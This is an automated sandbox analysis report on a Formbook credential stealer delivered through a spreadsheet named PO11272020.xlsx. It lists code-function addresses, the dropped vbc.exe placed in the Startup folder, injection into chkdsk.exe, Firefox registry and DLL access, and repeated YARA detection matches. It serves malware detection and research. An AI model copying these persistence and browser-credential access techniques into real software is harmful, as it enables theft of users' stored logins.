          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039C678
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039DF90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_005A28F8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00F22050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D997
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D20B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00402D87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00409E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D6BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008CE0C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008CE2E9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_009763BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008F63DB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D2305
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0091A37B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095443E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_009505E3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008EC5F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00916540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D4680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008DE6C1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0091A634
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00972622
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008DC7BC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008DC85C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008F286D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0097098E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D29B2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_009649F5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008E69FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0091C920
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0097CBA4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00956BCB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00972C9C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095AC5E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00900D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008DCD5B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00902E2F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008EEE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0096CFB1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00942FDC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008E0F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008FD005
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D3040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008E905A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0094D06D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095D13F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00971238
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008CF3CF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D7353
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008E1489
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00905485
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0090D47D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_009735DA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D351F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095579A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_009057C3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0096771D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0094F8C4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0096F8EE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00955955
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095394B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00983A83
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095DBDA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008CFBD7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008F7B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0096FDDD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0095BF14
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008FDF7C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00289882
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00281069
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00281072
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00288152
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0028DA0C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0028AA52
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00285B22
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00285B1F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00282CE9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00282CF2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00F22050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025F1238
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254E2E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02557353
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0259A37B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02552305
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025763DB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254F3CF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025F63BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0256905A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02553040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0257D005
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254E0C6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0259A634
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025F2622
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0255E6C1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02554680
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025857C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025D579A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0255C7BC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0258D47D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02585485
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02561489
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02596540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0255351F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0256C5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02603A83
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02577B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254FBD7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025DDBDA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025FCBA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0255C85C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0257286D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025EF8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025D5955
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025669FE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025F098E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025529B2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0256EE4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02582E2F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0257DF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02560F3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0255CD5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02580D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025EFDDD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00082D87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00089E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00082FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA9882
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA1069
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA1072
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA8152
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EAAA52
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EADA0C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA5B22
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA5B1F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA2CE9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA2CF2
          Source: PO11272020.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 025BF970 appears 81 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0259373B appears 238 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 02593F92 appears 110 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0254E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0254DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0084DF5C appears 137 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008BF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00893F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0089373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0084E2A8 appears 60 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: String function: 008CE2A8 appears 60 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: String function: 0093F970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: String function: 00913F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: String function: 0091373B appears 253 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: String function: 008CDF5C appears 137 times
          Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\chkdsk.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: mozglue.dll
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: winsqlite3.dll
          Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
